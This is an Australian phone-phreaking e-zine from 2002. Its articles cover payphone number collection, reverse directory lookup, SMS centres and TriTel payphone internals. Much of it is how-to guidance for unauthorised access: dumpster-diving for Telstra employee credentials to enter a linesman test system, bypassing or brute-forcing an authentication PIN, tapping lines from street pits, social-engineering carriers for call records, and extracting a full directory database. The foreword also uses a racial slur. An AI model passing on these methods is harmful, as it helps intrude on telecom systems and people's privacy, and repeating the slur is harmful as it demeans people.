phone_phreak_p4k

.::::::. Foreword ::::::::::::::::::::::::::::::::::::::::::::.
We are finally here a Wednesday night and the release of Issue Number One. It took longer than expected to get out, half because people keep promising articles and they never delivered them, and also because it took longer to get eveything happening than I thought that it would be. In the end most of these articles can be found on the respective author's websites for that exact reason. But as Zaleth said its better to have it all together in one area and hell this will *hopefully* get abit more coverage than the people's websites. Bleh, anyway here it is and I must also say a way big thank you to: Everybody that submitted articles- Zaleth, phreakaz0id, rioter, sangoma and head_rush. Also people who have encouraged me, helped me etc. etc. These people are mainly the guys that are found in #P4K on irc.linuxphreaks.org 6667, yeppa thats right these are the guys that love social ladder climbing or some bullshit like that. A finally a big big thank you goes to anomaly. he was kind enough to help edit the zine and was very very helpful with ideas. Thats it for me, so catch you niggers later. Half of this is probbly written in the introduction. Peace.


Phreak For Knowledge Issue Number One..
11/07/2002


.::::::.[00] Contents ::::::::::::::::::::::::::::::::::::::::.

	
	.:::.[01] Introduction :::::::::::::::::::::. [P4K]
	.:::.[02] Websites :::::::::::::::::::::::::. [P4K]
	.:::.[03] Getting Payphone Numbers v2.0:::::. [Zaleth]
	.:::.[04] Reverse Lookup Directory::::::::::. [Zaleth]
	.:::.[05] SMSc :::::::::::::::::::::::::::::. [Rioter]
	.:::.[06] TriTel Payphone Information ::::::. [phreakaz0id]
	.:::.[07] Paranoia & Being Paranoid Pt.1::::. [head_rush]
	.:::.[08] NPR(Non Phreaking Related) :::::::. [Sangoma]
	.:::.[09] Outtro :::::::::::::::::::::::::::. [P4K]
	.:::.[10] Other Crap :::::::::::::::::::::::. [P4K]


.::::::.[01] Introduction ::::::::::::::::::::::::::::::::::::.


	Now that we are getting closer to the time that we actually release this (master)piece of peoples work, I am rewriting the introduction. The last introduction I did even before the zine had any information in it at all. It was going to be a very small file containing just basic shit, that would help people along. As we come to the end, I didn't get one or two articles that I wanted to but the file is much bigger than I expected, at the current time of writing it is like 105kb. Now thats not too bad at all for a first release of any ezine, meaning that the articles come out much more detailed than I first thought, but while still being able to teach people the basic information. 

	This was originally meant to released around the end of May, but we just didn't get it out in time and now it is coming out a little bit later. we still want to release at least every two months, maybe even once a month, this is a strain on the people that write the articles (and edit -ed ;) and I understand that they have other things they need to do(i.e. Have a life) so we'll just see how it comes out. The last thing I want is for a shit zine to come out just because we don't have enough information, but I also don't want a zine that comes out like every 8 months or some crap like that. I would also like to stress this is designed at the more basic subjects, we hope to advance in the shit that we write, but we aren't in anyway saying that we are elite as what is written in the PhreakAu zine, but we hope to give people the information so that they can get to that level. 
	
	Really in the end, there should be no competition between people to decide who is the "elitest", there should be no flaming, no time wasting and no people asking about free calls and the usual crap like that. In the end the only reason you should need is the thirst for information, to learn and to advance the whole Australian Phreaking Scene rather than just yourself. The resources, skills and information you pull with more than one person is amazing, as well as the different ideas/views a person can bring to a subject. Hmmm, now I think that I am crapping on abit. Before you go on to read(learn) I hope that you appreicate the time and effort that people put into doing these articles and compiling this zine. If you want to knock it, first write something that is better, and then maybe you can go about knocking it. Enjoy... and most importantly LEARN!! 

.::::::.[02] Websites ::::::::::::::::::::::::::::::::::::::::.


Listed below are websites that we believe have important information or help in forwarding the Australian Phreaking Scene.

	.::P4K Site::.
	:: http://p4k.wiggerz.net/ ::

	.::Ausphreak Forum::.
	:: http://forum.onecenter.org/ausphreak/ ::

	.::PhreakAu Homepage::.
	:: http://pinegap.net/phreakau/ ::

	.::Zaleth's Site::.
	:: http://zaleth.wiggerz.net/ ::

	.::phreakaz0id's site::.
	:: http://www.angelfire.com/freak/az0id/ ::

	.::g0dfray's Site::.
	:: http://www21.brinkster.com/shadfray/ ::



.::::::.[03] Getting Payphone Numbers v2.0 :::::::::::::::::::. [Zaleth]


 - Introduction -

I wrote v1.0 on 19/Aug/2001 so since its May its time for another
update. Not too much has changed in the past 9 months, a few new
ANI numbers and a few blockages the Australian scene has
observed.

I will keep v2.0 detailed and I will include audio which shall
rev the future of html based tutorials to the max :D
Anyway I will include my original introduction because I simply
can't think of anything to write in here except how much the
scene has lifted and how I hate MTMS for updating all the X2's so
they all block iPrimus DCX.

This file is intended for Australians who are just starting out in
the phreaking world. This file is for educational purposes only.
One of the first questions I get is how to get Payphone numbers such 
as for Smart Phones and Blue Phones. There are around 15 types of 
payphones in Australia wether they are domestic or public. 
This file will show you various methods of obtaining a payphones 
number. I know this tutorial has been done dozens of times but I want
to make this one easier and more informative than the rest :)

Enjoy.

 - Contents -

I) Cabinet Identifiers

II) Collection Methods
	a) 0016 000 000 Number
	b) Beige Boxing
		i) Plans
	c) FAST (Best way)
		i) Work Arounds
		ii) Tone Dialler
		iii) Darkthief's Method
		iiii) Using
	d) Primus DCX
	e) ANI
	f) Calling Card

III) What to do with Payphone Numbers

IV) Ringing Payphones
	a) Smartphones
	b) TriTels

 - I: Cabinet Identifiers - Key Terms -

I will be using the Cabinet identifiers for each of the phones so you
will learn there two letter cabinet numbers for the phones now! This
has everything! When I mention a Gold Phone I will call it a GP
because Credit Phones and Gold Phones have the same cabinet numbers.

Also not all phones will be mentioned in this text so some are just
here for you to learn about.

Blue Phones: L6, L5
Credit Phones: C4
Card/Eftpos Phone: B1, B2
Dorro Phone: 
Gold Phones: C4
Green Phone: M6, M7
Multimedia Payphones/MmP: K2
Phonecard Phones: P1, P2, S1, S2
Red Phone: L5
Smart Phones: X1, X2, X7, Y1, Y2, Z1, Z2
TriTel Phones: 

Other unknown: C1, T2


 - II: Collection Methods - 


-- A: 0016 000 000 --

[Sound Recording]

The 0016 000 000 number is out of date and if you try this method
you will find that the three digits that you're after at the end of the
call will be cut off. This method also costs 40cents which is a major 
piss off.

If you want to use this method you dial 0016000000 on the payphone 
then wait until the guy stops talking, now get your pen ready and
write down any numbers mentioned after "SCANTS SCORESBY" which will be
read out by the telstra lady. Once you have the three digits the only
ones you will be interested in are the last two digits.

Look on the payphone or if its an X2 on the left hand side on the
poster. You will see a number, for this purpose I will say its:
9321 45X2 and lets say the code I got from the number was 168

Firstly throw away the first digit you don't need it. Now this is
where you year 2 maths comes in handy.

The code I got was 168 so I get rid of the first digit to leave 68.
6 + 1 = 7 , 8 + 1 = 9

So now we have found that the last two numbers of the payphone is:
79 making the number 9321 XX79 . Now here comes the time consuming
part, you will need to scan 99 numbers to find the payphone number its
recommended you do this from a payphone so you won't be found. When
you trying to find the number listen either for the phone to ring, or
on your phone it may be engaged or the phone may display
Service Unavailable. I personally don't use this technique because its
a waste of time.

With this number you can also use, 001618129773868 or any other
international number which darkthief pointed out.


-- B: Beige boxing --

This is a simple way but can be dangerous depending on the time of 
day.
You can easily obtain a number this way and you can easily be caught.

Firstly you will need to construct a beige box, there are hundreds of
plans out there so it shouldn't be hard to find, I have added my plan 
into this tutorial to save time. 
Next you will need to open the pit near the phone and connect up 
your beige box, depending on the wires connect your beige box's wire
to the red wire and the green wire to the green wire. I havn't beiged
in ages so I have forgotten the combination for the blue and white
wires, you should be able to figure it out in a matter of seconds.
Once connected, use the iPrimus DCX number which is 1800 855 747
when the lady starts talking press ** (This auth exploit was found by
me ;P ).

Also if you have time put black electrical tape around the exposed
wires seperatly. Then burn the tape a little bit so it seals.

I will be discussing more ANI numbers later on in this tutorial.


-- B:i: Plans --

Well I would recommend everyone has one of these they are so handy, 
you can use them at home if your wall mount is stuffed etc. I made a
diagram to make it easier for visual learners such as myself to learn
off. Anyway heres what you need.
1- A phone.
2- A pair of pliers.
3- Two alligator clips.
As you can see this is the poor arse way of making the box because
the soldering irons cost a crazy $20 :D 

For this part refer to the diagram below the text.

1- Open up the plug
   2- Remove the yellow and black wires or you can just leave them in.
   3- Remove the floor, or you can keep it on and when you finish the
   clips stick out the end of the plug.
   4- Grab the two alligator clips and slid the onto the copper and
   get the pliers and tighten the metal walls on the clips so it
   tightens. 

Wolla you have your very own beige box now wasn't that easy?


-- C: FAST --

FAST Stands for Field Automated Subscriber Testing which is a testing
number for Telstra linesmen, so do not abuse this number.

This is one of the two ways I use to obtain numbers its easy to use 
and takes under 1min to obtain a number.

Pick up the receiver of the payphone and dial: 1800 050 051
then you will hear the Telstra lady go 
"Welcome to FAST, Telstras field test facility, 
Please enter your employee number followed by your pin".

Ok the hard part is getting a telstra employee number and pin, the 
best way is to go trashing/dumpster diving at a telstra exchange 
the night before rubbish collection. Look for any pay packet 
letters because they contain the employee numbers, and you will have 
to use your own resources to find the pin number.

Once you have accessed FAST's main menu press 1 then the telstra lady
will say "The line to be tested is xx xxxx xxxx" now you have got it!


-- II:C:i: Work arounds --

So the payphone has blocked FAST or DCX? well here are some handy work
arounds. These are intended for you to use of course and to spark
ideas for finding more work arounds.
Note: FAST gets used as an example, you can use any other blocked
number.

1) Tone dialler

This is a simple way you can buy a Tone dialler from Tandy for the 
price of a big mac because they are being discontinued.

Pick up the handset dial 1800 on the phone then hold the tone dialer 
to the mouth piece and dial 050051 and you will be connected in no 
time.

You can also use your mobile phone as a tone dialler make sure DTMF 
is enabled on them.

2) darkthief's method

This is by far the best way to use the work around because you don't
require a tone dialler.

Pick up the handset, dial 180005005 then press the Follow on button
then * (star) followed by pressing 1. You will get connected, also
a week after Dark Thief released this work around I found two phones
which had blocked it, this shows Telstra is watching us. What happens
is when you press the * you will get an engaged tone so you can't go
no further, we will have to fix that.

This method works on X2's and P2's (The only phones with the block).

3) Godfrays method

This way is the newest of them all, another great vibe to this method
is that after the # key the digits are hidden.
So this is what you do:
Pick up the handset dial 18000500 press # wait and then dial 51 now
you will be connected to fast in no time :P

4) Credit/Eftpos Phones
This technique was found by myself, a few people couldn't figure out
how to get a B2's phone number so I had to make my way to the airport
to figure her out and this is what i came up with in 2mins.
1] Pick up the receiver. 
2] Hold down SERVICE CALL button. 
3] Dial in the service number (e.g. DCX &/or FAST). 
4] When asked for Authorisation hold down the SERVICE
CALL button and input what ever is necessary.


-- II:C:ii: Using --

Some phones are so out of date that you can't access the fast menu
so you will require a tone dialler. Lets use the GP as an example
you dial 1800050051 input the employee number and pin but your unable
to connect.

Now this is the part where your tone dialler comes in handy,
dial 1800050051 wait until your asked to input your acquired employee
number and pin. When the telstra lady asked pick up your tone dialler
and hold it up to the microphone turn it on and type away. Simple
isn't it?

Another alternative is that you can use your mobile phone as a tone
dialler, lucky because you cannot buy tone diallers now because they
have been phased out by telstra saying that people combine the keys
to make a bluebox, how ever the mobile phone must have dtmf keys
enabled.

-- D: Primus DCX --

This is another favorite method of mine and its really quick aswell,
pick up the phones handset dial 1800 855 747, you will here a person
talking about another number 1300 855 747 but don't worry about that.

When the person finishes talking you will need to enter a four digit
pin then press * (star). You will hear "Welcome to the iPrimus DCX"
blah blah blah, its a strange system and you should just wait until
you hear "ANI" and the number will be read out straight after.

There is a very simple way around the pin system. Since in computer
terms * is a wild card you do this. "Please enter your pin" press **
and you will be connected in no time ;) or use a pin darkthief found
6126. There are more DCX numbers out there byt they are safe guarded
away from the public because in a May MTMS update Telstra blocked the
1800855747 number, but just use one of the Work Arounds to overcome
this block :P
(Ed: Since the Zaleth writing/submitting this article the Primus DCX has
been patched so the exploit of using ** to bypass the login doesn't work
anymore. So now you will haveto try to bruteforce the logon. These sort
of things happy due to abuse and public posting of the details on such
areas as the AusPhreak BBS, where it is known to be monitored by Telcos
employees/pigs. So just be careful and wise what you post.)




-- E: ANI --

ANI stands for (A)utomatic (N)umber (I)dentification.

When you dial a ANI number the number will be read out for you to
record. Isn't this nice ;)

Here are the ANI numbers, just simply dial them. The 127 numbers
don't work on payphones such as X2's and P2's because they have been
blocked by the phoneline itself, the name for a payphone phoneline is
called "EQL".

ANI inc. mobiles: 018 018 222
Telstra ANI: 127 22 123
Telstra ANI: 1800 801 920 <=- Found by me ;P
Optus ANI: 127 23 12
iPrimus DCX: 1800 855 747


-- F: Calling Card --

This was mentioned in a eZine, go and buy either a 
Optus, Primus or Telstra calling card. Now once you have it go and
make a couple of phone calls from the payphone, then the next day
ring up the card provider lets say Primus and say you made a phone
call yesterday. Now here comes your social engineering this isn't 
hard tell them you made a call yesterday and ask for the record for 
the number of the calling party and the number of the called party.

This method is a waste of time, so there is no point in going to
these lengths in getting a simple payphone number.


 - III: What to do with Payphone numbers -

So you have acquired a payphone number and now what you ask? Well
there are many things you can do, you can call the payphone up and 
talk to the random person who picks up.

You can call the payphone and organise someone to be there at a
certain time to talk to you etc, the list is endless if your doing the
random talker be creative act bogan confuse the person and make sure
you get a good laugh out of it.


 - IV: Ringing Payphones -

Payphones ringers are being disabled so they don't ring because
Tel$tra are paranoid about drug lords using their payphones as selling
points etc. Now lets piss Telstra off with out work arounds :D


-- A: Smartphones -- 

This method was found by me, it is difficult to get to work first time
but just takes practice, ring the smartphone pickup the reciever press
[OK] and press 3 keys eg. 1 4 8. Now you have enabled a two way chat
the OK button accepts the phone call and the three dtmf keys enable
the microphone so you can talk.


-- B: TriTels --

Personally I've never had to ring a TriTel so I'm going off what I
have read and discussed with Phreakaz0id the TriTel king.
Ring the TriTel the LCD screen will display
"Thank You. Please Insert Money/Coins" and when the receiving party
lifts the handset the call will cut out, they must hangup and pickup
again and you will hear a long beep during which you (the caller) can
speak down the phone. How ever you will only hear a hollow sound.
Ok now Ring the TriTel, Reciever picks up and hangups and picks up
again now the reciever presses three DTMF keys so the microphone
activates (Pressing three DTMF keys is an old trick for enabling the
mic).

.::::::.[04] Reverse Lookup Directories ::::::::::::::::::::::. [Zaleth]
					

 - Introduction -

Reverse Lookup's are very easy to get your hands on it
just requires your  time in extracting the directories
major databases with limited resources.

Recently  in the news, DtMs  Phone CD have been in the
courts  for  copyright  infringements.  Now  this  may
effect   future  releases of  this  CD  or  it just be
Tel$tra  being  bastards about  a  little  competition
in the whitepages/directories game.


 - Equipment -

You will need the following to  pull off making a nice
reverse lookup:

1x DtMs Phone CD
   - This  CD  you  can  purchase at your Office Works
     or  Tandy  and Dicksmiths.  I recommend you phone
     up  the shop before  you wonder  in, they may not
     have it.
2x One Computer

DtMs Phone CD costs $20 however this version  does not
come with the reverse lookup, but you can pay an extra
$100 if  you really want to be  slack. So just buy the
$20  version and  put in  a little effort and you will
have a reverse lookup for $20 not $120.


 - How its Done -

Right you have all your required equipment  excellent.
DtMs   Phone    CD   comes   with    software   called 
"Marketing Pro"  I  want  you to  install this program 
because  this  is going to  be your  database stealer.

Once   installed   marketing   pro,   there   are fake 
database's  in  it's directory, swap the databases off
the   CD   with   the  fake  databases;  just  replace 
them/over write them.

Once done, run  Marketing Pro and click on residential
or what  ever  type of lookup you  would like and do a
wild search (for those who don't know what I'm talking
about a '*' search without the quotes).

You  will  recieve  a  huge  listing,  now you want to
export this database, you simply use the menu's in the
navigation  bar and export  the database, the database
when exported is over 1gig, so make sure you have lots
or  free  space,  my  database  is  1.2gig so  be very
prepared for a large file.

One  draw  back  is  that  you  may  start using other
programs while the database is saving, let me say this
don't because  marketing pro will stop  responding and
you  will loose  your database. Depending on the speed
of your computer  exporting the  database  can take up
to 20mins.


- Searching -
------------------------------------------------------
Ok  this is  where  the fun  starts,  when I search my
database i  just use  grep  in linux because its allot
easier, how ever for the people stuck in windows there
are  alternatives  you can  download "cygwin" which is
pretty much linux in a dll which has grep.

Or  you  can create  your  on program to search on the
database I'm happy with my command line:
$ cat rlook.db | grep 08-9331-4765


.::::::.[05] SMSc ::::::::::::::::::::::::::::::::::::::::::::. [Rioter]


There has been a rather large increase in smsc lately mostly to do with the fact that people think they can get free sms's from them this was true due to the fact that a flaw in the way they were set up i belive you wouldnt get billed correctly if you changed the smsc number to a number that was not of your network. This however like many things was fixed cause of over use now it is very rare to find a working one because most networks have now barred people from out side their networks from using that number but remeber "free sms's grow on trees" hehe now every one has an instrest on the free sms side but not to many people know what they are and how they work well here goes if anythings wrong not my fault blame multiple web sites and some stupid techies. 
	
The best way to think of a smsc is a gateway usually a big computer with a smsc software installed and uses a method called store and foreward if the phone that you tried to send to is off or out of service range it stores it on the server and tries to resend if it is stored their for a set period of time it is deleted and if their is no problems is forwared to your phone. a smsc does not always have to send to a phone it can be sent as a fax email or can be used to control some phones wap functions (might want to look for an exploit there) now the problem with sms's is that each network has a different protocall and the smsc checks what the network it is going to and if it need to goto a different networks smsc sends it to it and then the other networks smsc changes the protocalls and then stores or forwards the sms respectavly so it can take some time...

Well due to lack of time I have to been able to go into the detail i would have liked but i hope that clears any questions you had if you have anymore questions feel free to email me
RiOtEr


.::::::.[06] TriTel Payphone Information :::::::::::::::::::::. [phreakaz0id]
 

(ed: I lub the mad ascii skill0rz for the heading :P)

                   éffffffffffffffffffffffffffféâ÷
                   é                           é Ø
                   é       TriTel XP1230       é Ø
                   é     Handset Un-Mute &     é Ø
                   é      Other Payphones      é Ø
                   é                           é Ø
                   é      [ Version 1.0 ]      é Ø
                   é                           é Ø
                   é       ~pHreakaz0id~       é Ø
                   é                           é Ø
                   éúúúúúúúúúúúúúúúúúúúúúúúúúúúé Ø
                    ÂââââââââââââââââââââââââââââP

                Contacting the elusive -=pHreakaz0id=-
                     >> Aust Phreaking Forum <<
                   >> phreakaz0id@hotmail.com  <<
                >> #ausphreak,#p4k on Linuxphreaks.org <<
             >> http://www.angelfire.com/freak/az0id <<

      "The future is not a single national voice network with
      limited connection to the outside world. It will be a mass
      of interconnecting networks, under many different ownerships,
      of different geographical spreads, offering voice, image,
      text and data services from which the customer can choose
      quickly and easily."

              - Tom McKinlay, DG XIII, Eurpoean Commission [DeBony]

                          -=-=-=-=-=-=-=-=-=

                            >> Contents <<

* Summation - "TriTel XP1230 Handset Un-mute & Other Payphones"
* TriTel Payphones - The Un-Mute
   I.   Un-Mute Method for the XP1230
   II.  The Theory
   III. Dispelling the Myths
* TriTel Australia - The Specs
* Protel International & the TrendTek connection
* The Protel XP1230 Payphone - Specs
* Understanding the Payphone Line
   I.   Payphone Lines
   II.  Accessing the Line
   III. Pricing
* Appendix 1 - PayTel Australia
* Appendix 2 - Siemens Payphones Australia
   I.   Cityphone Compact
   II.  Easyset Entry
   III. Telstra Interset 751
   IV.  Diamond (L6 Bluephone)
   V.   Elasa (Telstra X1/X2)
* Appendix 3 - DORO Zircon Payphones
* Appendix 4 - Vector Technology Corporation (VTC)
* Appendix 5 - Metalwork, Heat Treatment, Tempering
   I.   Silver Solder Gaff
   II.  Lock Picks
* Resources & Links

                          -=-=-=-=-=-=-=-=-=

                        Somewhere in Australia
                               May 2002

     Tucked away in wooden enclaves or against cement-rendered walls flanked 
by bright green palmettes we find the TriTel sitting proudly upon its 
metallic throne. Encased within its plastic aegis, the first TriTel I layed 
eyes upon beseeched me to lift its Electro-dynamic handset and finger the 
delicate yet manipulable keypad as I would a sweet-scented woman.

     Enough with the shit, on with the show ...

     Summation - "TriTel XP1230 Handset Un-mute & Other Payphones"
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     This article basically covers the method of UN-Muting a TriTel payphone 
handset for clear Two-Way Communication with your accomplice, or whomever 
has called the phone. It also contains vital information pertaining to these 
new payphones seen frequently throughout all major cities in Australia. They 
are particularly fond of Westfield Shopping Centres and have been known to 
congregate within a variety of other Malls and the like on numerous 
occasions. Recent sitings of TriTel herds have been reported in Universities 
throughout Sydney and strays have been spotted roaming at the occasional 
public venue.
     Appendices at the end of the document contain details and various 
information on other exotic and rare payphones throughout Australia.


     TriTel Payphones - The Un-Mute
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     I. Un-Mute Method for the XP1230

     (i) From the Caller's point-of-view: When an External party dials the 
number for the payphone, they will hear two rings followed by a long beep. 
After this beep the Caller stays connected to the payphone for a period of 
approximately 2 minutes.
   · Anyone attempting to use the payphone will find that they cannot dial 
out since there is an incoming call occupying the line. The External party 
at this point will hear only a hollow sound.
   · If anyone lifts the handset at the payphone the External party (or 
Caller) will hear various clicks as it is being manipulated at the source 
and can actually listen in on the DTMF being played down the line as the End 
User attempts to dial numbers on the keypad (however, there several seconds 
of delay between when the DTMF was heard at the payphone and when they are 
heard by the calling party).
   · Whilst in this mode the Caller can actually speak to the Receiving 
party (at the payphone) but cannot hear any replies as the handset is still 
muted.
   · The Calling party remains connected for 1 or 2 minutes as mentioned 
earlier, they will stay connected for the duration of this period even if 
End User's at the payphone lift the handset and attempt to hang it up or 
disconnect the incoming call. As with telephone lines the Calling party has 
precedent over the connection of the call.

     (ii) From the [Payphone] End User's point-of-view: When the external 
source is ringing the payphone, for the first two rings there is no 
indication that a call is coming through. Once the external source hears the 
long beep, the LCD screen at the payphone displays  "Thank You. Please 
Insert Money/Coins".
     · If the Receiving party (person at the payphone) lifts the handset 
*before* the long beep (ie. during the first two calls only heard by the 
Caller): then they automatically "by-pass" it.
     · If the Receiving party lifts the handset *during* the long beep: they 
are able to hear the Calling party if they speak loud enough over the beep, 
but cannot reply as the handset is still muted. Sometimes the Receiving 
party is cut-off when they first lift the handset, see the following point 
for details.
     · If the Receiving party lifts the handset *after* the long beep: they 
will be automatically cut out, he/she must then depress the hook-switch and 
lift the handset again (or press Follow-On in some cases).
     · At this point the End User at the payphone can hear everything at the 
other end of the line but cannot be heard by the Caller. They must dial any 
random 1800 (Free to Caller) number. After a short pause of 2 or 3 seconds 
the handset is un-muted and both parties can have a continuous conversation 
minus interruptions by clicks, beeps or time-delays.

     II. The Theory

     When studying the XP1230 one begins to understand how it is possible 
that the Un-Mute method described here actually works. As will be detailed 
later on in the article, there are several outstanding features that make 
this payphone distinctly different to that of its rival the Telstra X2 
Smartphone.

     TriTel payphones work on ROA [R]eversal [O]n [A]nswer, which basically 
refers to the line polarity being reversed when a number is dialled thus 
unmuting the handset and charging the End User accordingly (Free to Caller 
numbers are obviously recognised as such and the payphone cannot charge 
you). (For further discussion on this matter See the chapter Understanding 
the Payphone Line).

     The payphone is an American Protel XP1230 model which has its own 
internal recognition software that analyses the actual number itself against 
the time of day & day of the week with a charging table - this is known as 
Self-Tariffing.

     The reason why the Un-Mute Method works is because when the End User 
dials the 1800 number, the payphone itself (as an individual entity and not 
via CLM) analyses the number that was dialled against the time of day and 
the charging table, within those few seconds it realises that the number is 
Free to Caller and this is where ROA comes into play. The line polarity is 
reversed, no money is taken (since it is free) and the handset is un-muted 
to allow the number to connect. Obviously, the number cannot connect since 
there is already a call occupying the line.

     III. Dispelling the Myths

     Over the past six odd months the TriTel payphone discussion has reached 
a climax, during that period many myths and misconceptions were distributed 
by pretentious neophytes and other undesirables. Provided are some brief 
points outlining what, in my extensive experience, are known to be fact:

    (a) TriTel XP1230 Ring-tone: this does *not* exist. I have heard of 
reference to some TriTel payphones in Canberra that are alleged to have a 
ring tone much like a "hushed" L6 Bluephone. Since there is no evidence to 
the contrary, the current status quo stands that when TriTel phones are rung 
the only external indication that there is an incoming call is a message on 
the LCD screen reading "Thank You - Please Insert Money".

    (b) The following payphones *cannot* call a TriTel XP1230 payphone for 
various reasons:

  · Telstra X1/X2 Smartphone (Siemens Elasa)
  · TriTel XP1230 (Protel)

    When one attempts to dial a TriTel from another TriTel, the line is 
immediately disconnected but the Calling party is charged 40 cents for the 
call before it drops out. X2's on the other hand are completely barred from 
dialling a TriTel XP1230 in some areas, but the vast majority are not barred 
from calling other X2 Smartphones.

    (c) TriTel payphones *cannot* accept Telstra Phonecards: this is true. 
Even though the XP1230 is infact quite capable of doing so, Telstra has 
barred access. For further discussion on this matter and consultations with 
the ACCC, see the link provided at the end of the "TriTel Australia - The 
Specs" chapter.

    (d) Yes, using Bankcards in TriTel XP1230's is perfectly acceptible, 
there are numerous signs on both the payphone itself and the stand 
indicating this.

    (e) Free To Caller number the Called Party dials to Un-mute the handset 
can "eavesdrop" on the conversation: this is *untrue* and was confirmed 
after extensive discussion with numerous phreakers on the Aust Phreaking BBS 
and over the phone. The XP1230 is Self-Tariffing rather than utilising 
Customer Loop Metering (See Understanding the Payphone Line) and is designed 
to analyse the number dialled against the time of day and a pricing chart. 
Since the number is Free to Caller (ie. 1800-xxx-xxx) the payphone is 
tricked into un-muting the handset, something which occurs via reversal of 
the line polarity when the called party lifts the handset - although in this 
situation the called party is the payphone itself and the handset is already 
off the hook. Due to the fact that the line is already occupied with a call 
between the external source and the called-payphone, it cannot actually 
connect the 1800 number the End User dialled.

     TriTel Australia - The Specs
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     John Bucknell - Managing Director
     TriTel Australia Pty. Ltd.
     135 Darling Street, Balmain East, Sydney 2041 NSW
     Ph: (02) 9810 0146 Fax: (02) 9810 2780
     E-mail:  tritel@ihug.com.au

   · Who: TriTel Australia is the only major alternative to Telstra for
     public payphones in Australia (see Appendices for others).
   · Evolution: Over the past two years TriTel Australia has expanded
     from operating payphones in major shopping centres throughout
     Sydney and in South Eastern Queensland, to entering the payphone
     market across Australia. They are found in Universities, shopping
     centres and a few public locations in almost every State and
     territory.
   · Payphone: TriTel use an American payphone that was proven in the
     USA to be "highly vandal resistant" - the Protel XP1230.
   · Objective: Deliver real benefits to the Australian public by
     offering substantially better rates than Telstra payphones.
     Compete with Telstra's long-standing monopoly of the payphone
     industry.

     For further discussions on Telstra's smartcard technology trial and its 
associations with TriTel paphones see "ACCC To Monitor Negotiations Over 
Payphone Service":

   - http://www.accc.gov.au/media/mr1999/mr-185-99.htm


     Protel International & the TrendTek connection
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     TriTel Australia makes use of the American payphone produced by Protel 
International, one of the major US payphone manufacturers. The payphone 
itself was provided through a contract with TrendTek Australia, the supplier 
of telecommunications products to major carriers, service providers and 
retail organisations throughout the Asia Pacific region. TrendTek receive 
the Protel XP1230 model via Galaxy Payphones (Supplier Code N1141). In 
addition to supplying TriTel with their payphones, TrendTek supplies various 
products to organisations such as Telstra, Optus, Alcatel, AT&T Australia, 
Ericsson, Australia Post and Queensland Payphones.

     The particular model utilised by TriTel is titled the Protel XP1230 and 
supports a variety of payment methods and access network connections. 
Network connection of the various payphones TrendTek offers can be provided 
via:

   · Conventional PSTN copper links
   · Cellular Wireless Networks (GSM, CDMA, AMPS)
   · VHF/UHF radio links
   · Digital Pair Gain systems

     Beneath the vast majority of these payphones - just under the cash box 
to be precise - is a sticker with the following details: "Galaxy Payphones 
(Supplier Code N1141) TrendTek Australia".

     The Protel XP1230 Payphone - Specs
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     The Protel XP1200/1230 Payphone offers a variety of payment options: 
magnetic stripe, microchip and coins/tokens. The XP1200 model is a 
coin/token payphone only; the XP1230 model upgrade (distributed in Australia 
by TrendTek and currently utilised by TriTel) offers both coins/tokens and 
card technology.

     Features:

   · Line-powered, loop start. 48 VDC line voltage, 20 mA minimum.
   · Two Protel [Remotely Programmable Electronic] Coin Scanner models
     are available:
     ECSII: Accepts coins of up to 27 mm in diameter with a max.
     thickness of 2.8 mm.
     ECSV: Accepts coins of up to 33mm in diameter with a max.
     thickness of 3.3 mm.
   · Reads all chip cards conforming to ISO 7816 and magnetic stripe
     cards Track 2 conforming to ISO 7810 to ISO 7813.
   · Optional SAM authentication (5 slots).
   · High Contrast Liquid Crystal Display of 2 lines x 20 characters
     per line, 9 mm character height.
   · Electro-dynamic handset [High Impact Poly-carbonate], hearing aid
     compatible with internal stainless steel lanyard with pull
     strength of 450 kg.
   · Rugged, Vandal-resistant Construction & Stainless Steel Faceplate
   · Magnetic Proximity Hookswitch
   · Six function keys for Language selection, Volume amplification,
     New Call [Follow On], Redial, Change Card, and Emergency number.
     [The last three keys are not yet operational in Australia - pH.]
   · Encased state-of-the-art electronics for physical and ESD
     protection.
   · High Quality Anti-drill Locks
   · 4mm Stainless Steel Vault Door
   · Anti-stuffing Coin Return
   · Call Subscriber Answer includes line reversal, 12/16 Khz, 50 Hz
     pulses, DTMF tones.
   · Bi-directional communications with the ProNet Payphone Management
     System for Call Detail Records and multiple alarm detection.
   · All payphone features, including Operating System, are
     downloadable from the ProNet Payphone Management System.
   · Self-Tariffing - TriTel Australia does not utilise CLM to operate
     its payphones. It analyses the dialled number against the weekday,
     time and a charging table to determine the call cost.
   · Service Difficulties - dial 1800 181 922
   · Utilises 1800 REVERSE (1800 738 3773)
   · Directory Assistance - Local: 1223 - International: 1225


     Understanding the Payphone Line
     ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
     I. Payphone Lines

     Standard payphone lines differ in several ways to that of a normal 
telephone line. In this section I will attempt to outline the main features 
which distinguish its line configuration.

     (1) Dial Tones: Payphone lines have a 60-second dial tone; as opposed 
to normal lines which have a standard 10 seconds (allowing customers time to 
insert money and dial).

     (2) ROA (Reversal On Answer): refers to the reversal of line polarity 
when the called party lifts the handset. This is necessary to indicate to 
the payphone when it should take the money, un-mute the handset and allow 
two-way conversation.

     (3) CLM (Customer Loop Metering): refers to a mechanism for charging 
calls to mobile phones, long distance and so on. For each timed period the 
exchange sends a pulse which is used to signal the payphone to deduct 
another 40 cents (1 meter pulse = 1 local call). Telstra payphones require 
these meter pulses to operate - this includes their Customer Operated L6 
Bluephones and C4 Goldphones.

     (4) Self-Tariffing: the [Protel] XP1230 TriTel payphone does not 
utilise CLM to operate. Instead, it is Self-Tariffing - essentially having 
its own intelligence, which allows it to analyse the dialled number against 
the weekday, time and a charging table to determine the call cost which is 
then displayed on the LCD.

     (5) Pre-selected Carrier Barring: the oppressive corporate giant that 
